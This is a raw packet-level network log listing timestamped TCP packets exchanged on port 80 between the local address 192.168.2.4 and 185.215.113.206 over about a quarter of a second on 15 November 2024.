Nov 15, 2024 14:09:28.639885902 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.640496969 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.640532970 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.640568018 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.640578032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.640578032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.640604973 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.640645981 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.640645981 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.641474009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.641510010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.641544104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.641552925 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.641552925 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.641580105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.641614914 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.641622066 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.641622066 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.641820908 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.643148899 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.643183947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.643219948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.643227100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.643227100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.643356085 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.644356966 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.644475937 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.644511938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.644563913 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.644603968 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.644603968 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.644651890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.645101070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.645503044 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.645539045 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.645572901 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.645572901 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.645574093 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.645611048 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.645627022 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.645654917 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.647090912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.647126913 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.647161961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.647167921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.647167921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.647236109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.648269892 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.648307085 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.648350000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.648350000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.648385048 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.648736954 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.649338007 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.649374008 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.649406910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.649415970 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.649415970 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.649444103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.649487972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.649487972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.649755001 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.649811983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.649923086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.649960041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.649993896 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.650037050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.650037050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.651051998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.651087999 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.651122093 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.651129961 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.651129961 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.651171923 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.651206017 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.651210070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.651334047 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.651947021 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.651983023 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.652028084 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.652028084 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.652470112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.652508020 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.652534008 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.652544022 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.652549982 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.652580023 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.652609110 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.652914047 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.653146982 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.653182030 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.653215885 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.653224945 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.653224945 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.653254032 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.653266907 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.653287888 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.653292894 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.653338909 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.654242992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.654278040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.654311895 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.654320002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.654320002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.654346943 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.654356003 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.654386997 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.655211926 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.655293941 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.655354023 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.655389071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.655421972 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.655431986 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.655431986 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.655483961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.655488014 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.655519009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.655555010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.655565023 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.655565023 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.655683041 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.778512001 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.778717041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.778755903 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.778762102 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.778762102 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.778965950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.779503107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.779539108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.779556036 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.779876947 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.780129910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.780167103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.780196905 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.780303001 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.781476021 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.781490088 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.781522989 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.781523943 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.781565905 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.781565905 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.782054901 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.782089949 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.782138109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.782138109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.782999992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.783036947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.783052921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.783071041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.783113003 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.783113003 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.783653021 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.783688068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.783732891 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.783732891 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.784693003 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.784728050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.784787893 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.785854101 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.785904884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.785948038 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.785948038 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.786703110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.786737919 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.786768913 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.786782026 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.786782026 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.786930084 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.787776947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.787812948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.787847996 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.787857056 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.787857056 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.787959099 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.789006948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.789042950 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.789067984 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.789165020 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.790061951 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.790098906 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.790244102 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.790354013 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.791207075 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.791241884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.791281939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.791285992 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.791285992 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.791331053 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.792614937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.792650938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.792684078 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.792807102 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.794266939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.794301987 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.794333935 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.794348001 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.794348001 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.794378042 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.796272039 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.796308041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.796359062 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.797346115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.797380924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.797431946 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.798837900 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.798875093 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.798964024 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.799945116 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.799997091 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.800029993 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.800039053 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.800039053 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.800081015 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.817039013 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.817094088 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.817121983 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.817131042 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.817168951 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.817176104 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.817176104 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.817203999 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.817235947 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.817877054 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.817914963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.817964077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.817964077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.818175077 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.818211079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.818269014 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.819411039 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.819448948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.819490910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.819490910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.819686890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.819724083 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.819760084 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.819766045 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.819766045 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.819892883 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.820219040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.820257902 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.820338011 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.820338011 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.824369907 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824408054 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824430943 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.824445009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824455976 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.824481964 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824513912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824531078 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.824532032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.824554920 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.824565887 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824620962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824637890 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.824654102 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824690104 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.824690104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824727058 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824729919 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.824750900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.824848890 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.824867964 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824903965 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824938059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.824955940 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.825033903 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.826222897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.826261044 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.826296091 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.826302052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.826302052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.826330900 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.826373100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.826373100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.827122927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.827158928 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.827178001 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.827193022 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.827230930 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.827233076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.827260971 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.827275038 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.828073978 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.828110933 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.828125954 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.828147888 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.828147888 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.828208923 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.829157114 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.829195976 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.829225063 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.829230070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.829247952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.829265118 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.829271078 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.829391003 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.830713987 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.830749989 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.830784082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.830792904 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.830820084 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.830820084 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.831098080 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.831605911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.831640959 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.831687927 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.831687927 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.832477093 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.832540035 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.832669973 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.832705021 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.832748890 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.832748890 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.833722115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.833758116 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.833800077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.833821058 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.842325926 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.842459917 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.842524052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.842566967 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.842602968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.842613935 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.842613935 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.842714071 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.843835115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.843887091 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.843908072 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.843950987 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.843997002 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.844033957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.844120026 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.845020056 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.845056057 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.845091105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:28.845098972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.845098972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:28.845132113 CET	49752	80	192.168.2.4	185.215.113.206
